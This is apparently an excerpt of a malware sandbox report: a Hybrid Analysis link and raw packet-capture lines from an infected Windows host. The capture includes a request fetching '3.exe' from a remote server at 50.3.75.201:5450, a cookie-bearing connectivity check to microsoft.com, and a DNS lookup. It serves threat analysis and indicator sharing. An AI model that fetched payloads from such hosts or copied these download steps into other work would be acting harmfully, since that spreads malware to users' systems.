https://www.hybrid-analysis.com/sample/e5e7d4859ca938d7cc3369099b5dc2eddb8b37f5abe53a115adec1d6e4a62d6c?environmentId=100     2016-10-23 00:38:21.122679 IP 192.168.1.102.58627 > 50.3.75.201.5450: Flags [P.], seq 0:284, ack 1, win 256, length 284 E..Dmk@…Ln…f2.K….J…..|4.P…&…GET /3.exe HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Accept-Encoding: gzip, deflate Host: 50.3.75.201:5450 Connection: Keep-Alive — E..(..@….d…f…….P…]d.v P….U…….. 2016-10-23 00:38:40.506816 IP 192.168.1.102.58630 > 191.239.213.197.80: Flags [P.], seq 0:285, ack 1, win 258, length 285: HTTP: GET / HTTP/1.1 E..E..@….F…f…….P…]d.v P….l..GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Host: microsoft.com Cache-Control: no-cache Cookie: MC1=GUID=2293236aa535f0419d025fcc74bb7e85&HASH=6a23&LV=201605&V=4&LU=1464392033590; A=I&I=AxUFAAAAAACLBgAAxLrgFeZEPolFxA6C0ICGYA!!&V=4 2016-10-23 00:38:40.609397 IP 192.168.1.102.62604 > 75.75.75.75.53: 49287+ A? www.microsoft.com. (35) E..?a=………fKKKK…5.+A…………..www    […]